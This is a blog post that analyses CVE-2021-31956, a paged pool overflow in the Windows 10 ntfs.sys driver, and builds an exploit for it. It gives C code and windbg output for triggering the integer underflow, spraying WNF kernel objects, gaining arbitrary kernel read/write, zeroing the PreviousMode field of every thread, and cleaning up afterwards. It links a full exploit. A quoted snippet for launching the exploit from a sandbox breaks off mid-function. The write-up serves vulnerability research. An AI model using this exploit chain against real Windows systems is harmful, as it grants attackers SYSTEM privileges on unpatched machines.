CVE-2021-31956 exploit and analysis

2022-09-03

Exploiting a paged pool overflow on Windows 10 to get system.

Introduction

In this post we’ll cover how to write an nday exploit for a Windows Kernel Pool overflow on a modern Windows 10 20H2 system, given an initial advisory, such as the one from Kaspersky regarding CVE-2021-31956 [1].

Advisory

The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function NtfsQueryEaUserEaList processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via ntoskrnl syscall and among other things it’s possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn’t check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.

for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )
{
  ...
 
  out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);
 
  if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )
  {
	ea_block = eas_blocks_for_file + ea_block_pos;
	ea_block_size = ea_block->DataLength + ea_block->NameLength + 9;
	if ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible
	{
  	memmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow
  	*out_buf_pos = 0;
	}
  }
  else
  {
	...
  }
 
  ...
 
  occupied_length += ea_block_size + padding;
  out_buf_length -= ea_block_size + padding;
  padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
 
  ...
}

The exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.

As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used “PreviousMode” technique instead.

Above is the original advisory released by Kaspersky, whose researchers first detected this vulnerability being exploited in the wild.

It contains a load of information, and the important ones are:

a heap-based buffer overflow in ntfs.sys
function NtfsQueryEaUserEaList
accessible via ntoskrnl syscall
integer-underflow
exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF)
exploit uses a rarely used “PreviousMode” technique

A nicely commented and named pseudo code is also provided, which greatly eases reverse engineering efforts.

Armed with these information, let’s try to recreate the exploit.

Finding the syscall

The original advisory stated that the bug can be triggered via a ntoskrnl syscall, which is available to usermode.

This should be our initial entrypoint of interacting with the kernel, so it’s important to find it out first.

Browsing a website that documents syscalls [2], we find the only two syscall related to Ea(extended attributes), are NtQueryEaFile and NtSetEafile.

Judging by name, one probably allows us to set extended attributes on a file, and the other allows querying those attributes.

We can confirm this by breaking on NtfsQueryEaUserEaList in windbg, clicking around and viewing the call stack once the breakpoint hits.

0: kd> g
Breakpoint 0 hit
Ntfs!NtfsQueryEaUserEaList:
fffff802`3603c124 4c894c2420      mov     qword ptr [rsp+20h],r9
3: kd> k
 # Child-SP          RetAddr               Call Site
00 ffffc70c`4e0902a8 fffff802`3603bc7a     Ntfs!NtfsQueryEaUserEaList
01 ffffc70c`4e0902b0 fffff802`3609c836     Ntfs!NtfsCommonQueryEa+0x22a
02 ffffc70c`4e090410 fffff802`3609c590     Ntfs!NtfsFsdDispatchSwitch+0x286
03 ffffc70c`4e090540 fffff802`342dc6c5     Ntfs!NtfsFsdDispatchWait+0x40
04 ffffc70c`4e0907e0 fffff802`35346ccf     nt!IofCallDriver+0x55
05 ffffc70c`4e090820 fffff802`353448d3     FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
06 ffffc70c`4e090890 fffff802`342dc6c5     FLTMGR!FltpDispatch+0xa3
07 ffffc70c`4e0908f0 fffff802`346d1528     nt!IofCallDriver+0x55
08 ffffc70c`4e090930 fffff802`34681344     nt!IopSynchronousServiceTail+0x1a8
09 ffffc70c`4e0909d0 fffff802`34415bb5     nt!NtQueryEaFile+0x484
0a ffffc70c`4e090a90 00007ff8`c05ce634     nt!KiSystemServiceCopyEnd+0x25
0b 000000bf`4367e918 00007ff8`acca903e     ntdll!NtQueryEaFile+0x14
0c 000000bf`4367e920 ffffffff`ffffffff     0x00007ff8`acca903e
0d 000000bf`4367e928 000000bf`4367e988     0xffffffff`ffffffff
0e 000000bf`4367e930 00000000`00000000     0x000000bf`4367e988

Indeed, the usermode API NtQueryEaFile will eventually call the vulnerable function.

Fortunately for us, the ZwQueryEaFile [3] and ZwSetEaFile [4] APIs are actually documented by MSDN.

Zw functions basically set a field called PreviousMode in the _KTHREAD structure to 0 to indicate a call from Kernel Mode, so userland check don’t occur when dispatching the API request, then calling the corresponding Nt function.

That being said, you can use the Zw function prototypes as the Nt function prototypes.

Initial POC

NTSTATUS ZwQueryEaFile(
  [in]           HANDLE           FileHandle,
  [out]          PIO_STATUS_BLOCK IoStatusBlock,
  [out]          PVOID            Buffer,
  [in]           ULONG            Length,
  [in]           BOOLEAN          ReturnSingleEntry,
  [in, optional] PVOID            EaList,
  [in]           ULONG            EaListLength,
  [in, optional] PULONG           EaIndex,
  [in]           BOOLEAN          RestartScan
);

NTSTATUS ZwSetEaFile(
  [in]  HANDLE           FileHandle,
  [out] PIO_STATUS_BLOCK IoStatusBlock,
  [in]  PVOID            Buffer,
  [in]  ULONG            Length
);

Reading the documentation reveals that both these functions work by providing them a _FILE_FULL_EA_INFORMATION [5] or _FILE_GET_EA_INFORMATION [6] structure.

Both of these are non-circular singly linked lists by nature, linked by the NextEntryOffset member, storing an EaName and an EaValue, separated by a null byte.

Each entry should be 4-byte aligned [7].

An example of setting and querying two EAs for a file will be:

HANDLE                      file = INVALID_HANDLE_VALUE;
IO_STATUS_BLOCK             x = { 0 };
FILE_FULL_EA_INFORMATION    *fetched_data = zalloc(0x300);
FILE_GET_EA_INFORMATION     *selector = zalloc(0x300);
FILE_GET_EA_INFORMATION     *selector2;
FILE_FULL_EA_INFORMATION    *eadata1 = zalloc(0x300);
FILE_FULL_EA_INFORMATION    *eadata2;

file = CreateFileA("c:\\users\\chenl\\desktop\\ABC.txt",
    GENERIC_READ | GENERIC_WRITE,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL,
    CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL,
    NULL);

selector->EaNameLength = (UCHAR)strlen(EANAME1);
memcpy(selector->EaName, EANAME1, selector->EaNameLength);
selector->NextEntryOffset = (ULONG)0xc;

selector2 = (PFILE_GET_EA_INFORMATION)((UINT64)selector + (UINT64)(selector->NextEntryOffset));
selector2->EaNameLength = (UCHAR)strlen(EANAME2);
memcpy(selector2->EaName, EANAME2, selector2->EaNameLength);
selector2->NextEntryOffset = (ULONG)0x0;

eadata1->Flags = (UCHAR)0x0;
eadata1->EaNameLength = (UCHAR)strlen(EANAME1);
eadata1->EaValueLength = (USHORT)0x9d;
memcpy(eadata1->EaName, EANAME1, eadata1->EaNameLength);
memset(eadata1->EaName + eadata1->EaNameLength + 0x1, 'C', eadata1->EaValueLength);
eadata1->NextEntryOffset = (ULONG)((eadata1->EaNameLength + eadata1->EaValueLength + 0x3 + 0x9) & (~0x3));

eadata2 = (PFILE_FULL_EA_INFORMATION)((UINT64)eadata1 + (UINT64)(eadata1->NextEntryOffset));
eadata2->NextEntryOffset = (ULONG)0x0;
eadata2->Flags = (UCHAR)0x0;
eadata2->EaNameLength = (UCHAR)strlen(EANAME2);
eadata2->EaValueLength = (USHORT)eadata2_chunk_sz;
memcpy(eadata2->EaName, EANAME2, eadata2->EaNameLength);
memcpy(eadata2->EaName + eadata2->EaNameLength + 0x1, eadata2_data, eadata2_data_sz);

_NtSetEaFile(file, &x, eadata1, 0x300);

NtQueryEaFile(file, &x, fetched_data, 0xaa, FALSE, selector, 0x300, NULL, TRUE);

The way of calculating NextEntryOffset is taken from the decompiled NtfsQueryEaUserEaList above. 0x9 bytes for the size of all the field members excluding actual data, adding 0x3 to ensure the buffer will not shrink when aligning it to 0x4 bytes with a bitwise AND.

If we want an integer underflow, out_buf_length must be smaller than padding while dealing with the second Ea list.

The smallest out_buf_length we can achieve is 0x1, which is when the size we specified is 1 byte larger than our first Ea list.

The largest padding size we can achieve is 0x3.

Using the values in the code above, a namelength of 0x3 and a valuelength of 0x9d makes a total size of 0xa0, which is 4-bytes aligned. Adding 0x9 to it gives us 0xa9, which is one byte off.

This means upon adding 0x3 as the final calculation, our padding will be exactly 0x3 bytes.

Subtracting the unsigned out_buf_length with a value slightly larger than itself yields a huge unsigned value, granting us a controlled size, controlled data pool overflow.

The question now is, is the size of pool allocation exactly the size we pass in?

We can verify it in IDA, by decompiling the parent function of NtfsQueryEaUserEaList, which is NtfsCommonQueryEa.

pool_buf = ExAllocatePoolWithTag((POOL_TYPE)(PoolType | 0x10), (unsigned int)size, 0x4546744Eu);
v28 = pool_buf;
v24 = 1;
v16 = size;
memset(pool_buf, 0, v16);
...
NtfsLookupEasOnFile(a1, v4,
                    (unsigned int)v40, 
                    (unsigned int)&v29,
                    (__int64)&v30,
                    (__int64)&Bcb
                    );
if ( v37[0] )
{
        v17 = (_OWORD *)NtfsQueryEaUserEaList((__int64)v37, v30, (__int64)v29, (char *)pool_buf, size, v37[0], v42);

If our assumptions were correct, r9 should contain a 0xc0 sized pool chunk(0xaa+0x10 round up), and dword ptr [rsp+0x28] should contain the size 0xaa (0x28 due to return address and parameter homing for the 4 register arguments).

1: kd> g
Breakpoint 0 hit
Ntfs!NtfsQueryEaUserEaList:
fffff802`3603c124 4c894c2420      mov     qword ptr [rsp+20h],r9
1: kd> dd rsp+0x28 L1
ffffc70c`4ed642d0  000000aa
1: kd> !pool @r9
Pool page ffff8f8f005855e0 region is Paged pool
*ffff8f8f005855d0 size:   c0 previous size:    0  (Allocated) *NtFE
		Pooltag NtFE : Ea.c, Binary : ntfs.sys

and yes, we were right.

If we allow the code to continue, it will certainly corrupt the pool chunk after ours, and likely crash the whole system.

We have to first “prepare” the pool to accept an overflow, so it’s predictable to us.

WNF

Before starting the exploitation steps, I’ll need to digress a little and talk about the Windows Notification Facility(WNF).

If you want a proper explanation regarding WNF and not my hacky garbage, check out this talk at Black Hat [8] and this blogpost by Gabrielle Viala [9].

Essentially, WNF is a feature of Windows for applications to deal with notifications.

For example, when an application has to wait on an event before continueing, but the event is non-existent yet, it can use WNF to monitor for that event.

Like all features of Windows, they are essentially a bunch of structures in the Kernel.

WNF has two main structures of interest, _WNF_NAME_INSTANCE and _WNF_STATE_DATA.

//0xa8 bytes (sizeof)
struct _WNF_NAME_INSTANCE
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    struct _EX_RUNDOWN_REF RunRef;                                          //0x8
    struct _RTL_BALANCED_NODE TreeLinks;                                    //0x10
    struct _WNF_STATE_NAME_STRUCT StateName;                                //0x28
    struct _WNF_SCOPE_INSTANCE* ScopeInstance;                              //0x30
    struct _WNF_STATE_NAME_REGISTRATION StateNameInfo;                      //0x38
    struct _WNF_LOCK StateDataLock;                                         //0x50
    struct _WNF_STATE_DATA* StateData;                                      //0x58
    ULONG CurrentChangeStamp;                                               //0x60
    VOID* PermanentDataStore;                                               //0x68
    struct _WNF_LOCK StateSubscriptionListLock;                             //0x70
    struct _LIST_ENTRY StateSubscriptionListHead;                           //0x78
    struct _LIST_ENTRY TemporaryNameListEntry;                              //0x88
    struct _EPROCESS* CreatorProcess;                                       //0x98
    LONG DataSubscribersCount;                                              //0xa0
    LONG CurrentDeliveryCount;                                              //0xa4
};

//0x10 bytes (sizeof)
struct _WNF_STATE_DATA
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    ULONG AllocatedSize;                                                    //0x4
    ULONG DataSize;                                                         //0x8
    ULONG ChangeStamp;                                                      //0xc
};

We can create a name instance using the NtCreateWnfStateName API.

typedef NTSTATUS(NTAPI *NCWSN)(
    _Out_ PWNF_STATE_NAME StateName,
    _In_ WNF_STATE_NAME_LIFETIME NameLifetime,
    _In_ WNF_DATA_SCOPE DataScope,
    _In_ BOOLEAN PersistData,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_ ULONG MaximumStateSize,
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor
    );

This will return a StateName to usermode, which we can use to reference this particular name instance.

By passing this statename to the NtUpdateWnfStateData function, a _WNF_STATE_DATA structure is created.

The StateData member(0x58) of the name instance points to this statedata structure.

typedef NTSTATUS(NTAPI *NUWSD)(
    _In_ PWNF_STATE_NAME StateName,
    _In_reads_bytes_opt_(Length) const VOID *Buffer,
    _In_opt_ ULONG Length,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_opt_ const PVOID ExplicitScope,
    _In_ WNF_CHANGE_STAMP MatchingChangeStamp,
    _In_ ULONG CheckStamp
    );

The Length argument we pass is used to populate the AllocatedSize and DataSize of the _WNF_STATE_DATA structure, where AllocatedSize defines the size we can write, and DataSize defines the size we can read.

StateData = 0i64;
  if ( *(_QWORD *)(NameInstance + 0x58) != 1i64 )
    StateData = *(_DWORD **)(NameInstance + 0x58);
  if ( !StateData && (*(_QWORD *)(NameInstance + 0x68) || (_DWORD)_length)
    || (v13 = StateData) != 0i64 && StateData[1] < (unsigned int)_length )
  {
      v19 = ExAllocatePoolWithTag(PagedPool, (unsigned int)(_length + 0x10), 0x20666E57u);

...

for ( i = *(_DWORD *)(NameInstance + 0x60) + 1; !i; i = 1 )
    ;
  if ( *(_QWORD *)&alsoStateData )
  {
    memmove((void *)(*(_QWORD *)&alsoStateData + 0x10i64), _buffer, _length);
    *(_DWORD *)(*(_QWORD *)&alsoStateData + 8i64) = _length;
    *(_DWORD *)(*(_QWORD *)&alsoStateData + 0xCi64) = i;

Simplified pseudocode above for ExpWnfWriteStateData shows that if StateData.AllocatedSize < Length, a new buffer will be allocated in the paged pool(controllable length again!). The new buffer is 0x10 bytes larger, because a new _WNF_STATE_DATA_ structure sits above the actual data.

Otherwise if AllocatedSize >= Length, data is copied to the old buffer, DataSize(read size) is set to Length, and ChangeStamp is updated accordingly.

We can read data with NtQueryWnfStateData

typedef NTSTATUS(NTAPI *NQWSD)(
    _In_ PCWNF_STATE_NAME StateName,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_opt_ const VOID *ExplicitScope,
    _Out_ PWNF_CHANGE_STAMP ChangeStamp,
    _Out_writes_bytes_to_opt_(*BufferSize, *BufferSize) PVOID Buffer,
    _Inout_ PULONG BufferSize
    );

*ChangeStamp = *(_DWORD *)(*(_QWORD *)&StateData + 0xCi64);
*BufferSize = *(_DWORD *)(*(_QWORD *)&StateData + 8i64);
datasize = *(_DWORD *)(*(_QWORD *)&StateData + 8i64);
if ( usermode_address_max < datasize )
{
  v14 = -1073741789;
}
else
{
  memmove(Buffer, (const void *)(*(_QWORD *)&StateData + 0x10i64), datasize);

As shown in the simplified pseudocode for ExpWnfReadStateData, BufferSize and ChangeStamp is updated at whatever is that StateData+0x8 and StateData+0xC respectively. Then data is copied back to usermode.

Finally, we can free both allocations with NtDeleteWnfStateData and NtDeletWnfStateName.

All in all, using both of these structures together can give us a really good read/write primitive.

The _WNF_NAME_INSTANCE structure is 0xc0 sized in the paged pool. That’s why I chose the overflow chunk in the previous section to also be 0xc0 sized.

Size of the _WNF_STATE_DATA structure can be controlled, based on the Length we pass to NtUpdateWnfStateData.

Exploitation Outline

The idea is we try to get our overflowing Ntfs buffer from earlier, to be placed right before a _WNF_STATE_DATA chunk in memory.

By overwriting the AllocatedSize and DataSize, we get a huge read/write ability in the pool ahead of this chunk.

We can use this to find a nearby _WNF_NAME_INSTANCE chunk, and locate its StateName.

With the StateName, we can now query the _WNF_STATE_DATA associated with this name instance(remember that statename is a reference to the name instance).

Using our write ability, update the StateData pointer of the name instance to point anywhere in memory.

As long as the eventual AllocatedSize and DataSize of our rogue _WNF_STATE_DATA is sane, we can read/write anywhere in memory.

Heap Spray

The kernel is active, and thousands of allocations and de-allocations are happening all the time.

The only way we can maximize our chances of having the Ntfs buffer placed before the _WNF_STATE_DATA buffer, is to create tens of thousands of statedata buffer in the paged pool.

for (int i = 0; i < count; i++) {
        status = _NtCreateWnfStateName(&(statenames[i]), WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, sd);

        status = _NtUpdateWnfStateData(&(statenames[i]), buf, buf_sz, 0, 0, 0, 0); // spray 0xc0 sized kernel chunks
    }

This process is known as Heap Spraying.

Then we free roughly one third of the chunks.

for (int i = 0; i < count; i += 3) {
        // create holes
        status = _NtDeleteWnfStateData(&(statenames[i]), NULL);

        status = _NtDeleteWnfStateName(&(statenames[i]));

        statenames[i].Data[0] = 0;
        statenames[i].Data[1] = 0;
    }

If we think of the pool full of WNF structures as a big blob of cheese, there are now thousands of holes in the cheese.

Many of these will be taken up by other 0xc0 size structures, allocated by other processes or even the kernel itself.

However if we are lucky(and if we spray enough), we should land right in the middle of a bunch of WNF structures.

1: kd> !pool @r9
Pool page ffff8f8f005855e0 region is Paged pool
 ffff8f8f00585090 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585150 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585210 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f005852d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585390 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585450 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585510 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
*ffff8f8f005855d0 size:   c0 previous size:    0  (Allocated) *NtFE
		Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8f8f00585690 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585750 size:   c0 previous size:    0  (Free)       Wnf
 ffff8f8f00585810 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f005858d0 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585990 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585a50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585b10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585bd0 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585c90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585d50 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585e10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585ed0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080

The WNF Problem

The approach above has a pretty big problem. That is, we do not know if we overflown a _WNF_STATE_DATA chunk, or a WNF_NAME_INSTANCE chunk, since both are 0xc0 sized.

Blindly assuming can lead to a great fall in success rate.

If we inspect both structures, we can see the ChangeStamp member of statedata being returned back.

This means if we carefully control the overflow to only 0x20 bytes(pool header + up to ChangeStamp), we can query all statedata chunks to verify if we actually overflown a statedata chunk.

If we did not, it will only corrupt the Header and RunRef field of the nameinstance chunk, which is ok for now. We can fix that at the end of the exploit. We will just have to attempt the overflow again.

do {
    if (!NT_SUCCESS(overflow_chunk(OVERFLOW_SZ, OVERFLOW_DATA, OVERFLOW_SZ)))
        goto out;

} while (!NT_SUCCESS(find_chunk(statenames, SPRAY_COUNT, &buf, &buf_sz, &overflow_idx)));

Enumerating _KTHREADS

Now, assuming our attack succeeded and we gain arbitrary read/write, where should we write?

Of course we can directly NULL out current process ACL or steal a system token, but to emulate the adversary, I think we should perform the PreviousMode attack.

More about PreviousMode on the next section. For now just know it’s a field in the _KTHREAD structure, which is referenced by the _KPROCESS structure’s ThreadListHead member, and _KPROCESS shares the address with _EPROCESS.

In order to increase the success rate of our attack, we should perform the attack on all _KTHREADs present in the process.

With our arbitrary read, we first read the Blink of the ThreadListHead member, a backward link of the circular doubly linked LIST_ENTRY.

This Blink will point to the first _KTHREAD‘s ThreadListEntry field, so we subtract 0x2f8 to find the first _KTHREAD‘s address.

threadlisthead = (ULONG_PTR)((ULONG_PTR)own_eproc + (ULONG_PTR)0x30);
    arbwrite_name->StateData = threadlisthead;
    
    if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
        goto out;

    ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;

    _NtQueryWnfStateData((WNF_STATE_NAME *)&ext_statename, NULL, NULL, &stamp, write_data, &write_data_sz); // this call will fail, so we don't error check
    
    kthread_blink = (UINT64)stamp << 32 | (UINT32)write_data_sz;
    write_data_sz = 0x5000;
    memcpy(write_data, read_data, 0x5000);

    kthreads[0] = (UINT64)kthread_blink - (UINT64)0x2f8;
    if ((UINT64)kthreads[0] < 0xFFFF800000000000) {
        log_warn("Fail to find _KTHREAD in memory");
        goto out;
    }

    printf("[+] Found _KTHREAD 1 at %p\n", kthreads[0]);

Some points to explain in the code above.

Firstly, we XOR the leaked statename with the statename constant of 0x41C64E6DA3BC0074. Reason being, the statename returned to usermode is actually not the actual statename stored in kernel memory.

Then we point the StateData at the ThreadListHead member and attempt a query.

This query will fail, because we don’t have sane size fields near there. Even if we do, we don’t know how much of a buffer to pass it, because the read operation demands an exact size of the DataSize member.

However, recall from the WNF section above, the ChangeStamp and BufferSize fields are actually populated with values at that memory location.

In this case, they will form the Blink value.
(Fun fact, I made a mistake by naming them flink in my actual exploit lmao.)

You may ask how did I find my own _KPROCESS address in the first place?

I used a well known trick using the NtQuerySystemInformation API(also used in my Exploiting Inherited Handles blog) to leak out kernel addresses of handles.

However, we can actually also read the CreatorProcess field of _WNF_NAME_INSTANCE to leak the _KPROCESS of our current process, in case the API gets patched in future releases.

From here, we can traverse the list and enumerate all _KTHREADs.

for (int i = 1; i < MAX_THREAD_SEARCH; i++) {
        arbwrite_name->StateData = kthread_blink; // find previous kthread

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        ext_statename = *(PULONGLONG) & (arbwrite_name->StateName) ^ STATENAME_CONST;

        _NtQueryWnfStateData((WNF_STATE_NAME *)&ext_statename, NULL, NULL, &stamp, write_data, &write_data_sz); // this call will fail, so we don't error check

        kthread_blink = (UINT64)stamp << 32 | (UINT32)write_data_sz;
        if ((UINT64)kthread_blink == (UINT64)threadlisthead)
            break; // break if there are no more unique entries

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        kthreads[i] = (UINT64)kthread_blink - (UINT64)0x2f8;
        if ((UINT64)kthreads[i] < 0xFFFF800000000000) {
            log_warn("Fail to find _KTHREAD in memory");
            goto out;
        }

        printf("[+] Found _KTHREAD %d at %p\n", i+1, kthreads[i]);
    }

Once we find all the threads, we can perform the PreviousMode Attack on all of them.

PreviousMode Attack

PreviousMode is a one byte member of the _KTHREAD structure.

It’s used when kernel APIs(those implemented in ntoskrnl.exe, but share the same name with user APIs in ntdll.dll) are performing validation.

UserMode has a value of 1, and KernelMode has a value of 0.

When an API request is serviced, security checks will be invoked based on the PreviousMode.

For example, memory boundary checking is enforced if PreviousMode is set to 1 for the NtReadVirtualMemory API to make sure usermode threads cannot read kernel data.

However if PreviousMode is set to 0, the system will gladly skip all checks and assume you are running as a kernel driver.

This is great news for us as exploit writers.

By nulling out the PreviousMode byte, we can achieve real and hassle free arbitrary read write, with Windows APIs.

for (int i = 0; i < MAX_THREAD_SEARCH; i++) {
        if (kthreads[i] == 0)
            break;

        arbwrite_name->StateData = (UINT64)kthreads[i] + 0x220; // kthread.Process

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;
        if (!NT_SUCCESS(_NtUpdateWnfStateData((WNF_STATE_NAME *)&ext_statename, prev_mode, 0x3, NULL, NULL, 0, 0))) {
            log_warn("main::_NtUpdateWnfStateData()1");
            goto out;
        }

        printf("[+] Overwritten PreviousMode of _KTHREAD %d to 0\n", i+1);
    }

Clean Up

Stealing token and spawning shell is pretty straightforward, so I’ll skip to cleanup.

There are a few things we have to clean up.

While trying to overflow statedata chunks, we might have set the RunRef member of a nameinstance chunk to an invalid value.

This can lead to a crash when the system uses this field.

Since it’s a reference counter, we can fix it by setting it to 0.

We can find all our nameinstance blocks by accessing the WnfContext field of our _EPROCESS and traversing the linked list.

NTSTATUS fix_runrefs(_In_ PWNF_PROCESS_CONTEXT ctx)
{
    NTSTATUS            status = STATUS_SUCCESS;
    PLIST_ENTRY         head = (PLIST_ENTRY)read64(&(ctx->TemporaryNamesListHead));
    PLIST_ENTRY         next = read64(head);
    PWNF_NAME_INSTANCE  cur = CONTAINING_RECORD(next, WNF_NAME_INSTANCE, TemporaryNameListEntry);

    for (; next != head; next = read64(next), cur = CONTAINING_RECORD(next, WNF_NAME_INSTANCE, TemporaryNameListEntry))
        if ((UINT64)read64(&(cur->Header)) != (UINT64)0x0000000000A80903) {
            write64(&(cur->Header), (UINT64)0x0000000000A80903);
            write64(&(cur->RunRef), (UINT64)0x0000000000000000);
        }

    puts("[+] Fixed all overwritten header and runrefs");

    return status;
}

Next, we’ll have to set the PreviousMode of all _KTHREADs back to 1, because we don’t know which ones were set to 1 before.

Even if we set an actual kernel thread’s PreviousMode to 1, it should still be fine, because by right kernel code should call the Zw version of functions, which still bypasses checks.

Finally, we have to patch the StateData pointer of our corrupted nameinstance chunk.

if (!NT_SUCCESS(fix_runrefs(ctx)))
        goto out;

    for (int i = 0; i < MAX_THREAD_SEARCH; i++) {
        if (kthreads[i] == 0)
            break;

        arbwrite_name->StateData = (UINT64)kthreads[i] + 0x220; // kthread.Process

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        ext_statename = *(PULONGLONG) & (arbwrite_name->StateName) ^ STATENAME_CONST;
        if (!NT_SUCCESS(_NtUpdateWnfStateData((WNF_STATE_NAME *)&ext_statename, old_prev_mode, 0x3, NULL, NULL, 0, 0))) {
            log_warn("main::_NtUpdateWnfStateData()1");
            goto out;
        }

        printf("[+] Restored PreviousMode of _KTHREAD %d to 1\n", i + 1);
    }

    if (!NT_SUCCESS(write_pool(statenames, overflow_idx, read_data, fix_size)))
        goto out;

And now we can happily spawn a system shell, with the system still stable, unless the heap spray failed and we accidentally overwrote some other datastructure other than the WNF structures.

Conclusion

You can find my full exploit here:
https://github.com/Y3A/CVE-2021-31956

Abusing WNF structures was new to me, but I’m impressed by its flexible read/write capabilities.

Furthermore, it’s a paged pool gadget, which is quite rare(normally you hear people exploiting non-paged pools more).

I’m pretty convinced that kernel exploitation is mostly about “who has more super secret undocumented gadgets of varying sizes to use in both pools”.

Without shoulder standing on the references listed below, there’s no way I could have figured all these out in an efficient amount of time.

All respects to vuln/system researchers!

Update

A reader reflected that he was unable to call the WNF APIs from low privilege(e.g chrome sandbox).
My exploit here does not take that into consideration, but as mentioned by @k0shl in a tweet, it’s absolutely possible to launch the exploit from a sandbox.

Ad verbum:

Well, this depends on the SecurityDescriptor parameter of NtCreateWnfStateName and NtUpdateWnfStateData, in the sandboxed situation, you should invoke NtQuerySecurityObject from process token and get a SD which can be accessed by sandboxed process, and pass it to WNF API

His code to achieve this:

BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) {
    NTSTATUS Status;
    HANDLE gProcessToken;
    WNF_TYPE_ID TypeID = { 0 };
    PSECURITY_DESCRIPTOR SecurityDescriptor;
    ULONG RetLength = 0;
    BOOL DaclPresent, SaclPresent;
    BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault;
    PACL pDacl, pSacl;
    PSID pOwner, pGroup;
    ACE_HEADER* AceHeader;
    ACCESS_ALLOWED_ACE* pACE;
    PSECURITY_DESCRIPTOR GetSD;
    
    Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken);
    if (Status < 0) {
        return FALSE;
    }
    
    SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD

    GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000);

    Status = fNtQuerySecurityObject(
        gProcessToken,
        OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION,
        GetSD,
        0x1000,
        &RetLength); // Query a accessible SD from process token

    if (Status < 0)
    {
        return FALSE;
    }

    // Get Owner/Group/DACL/SACL from accessible security object
    GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault);
    GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault);
    GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault);
    GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault);

    AceHeader = (ACE_HEADER*)&pDacl[1];
    while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize)
    {
        if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE)
        {
            pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0];
            pACE->Mask = GENERIC_ALL;
        }
        AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize);
    }

   // Set it to new SD
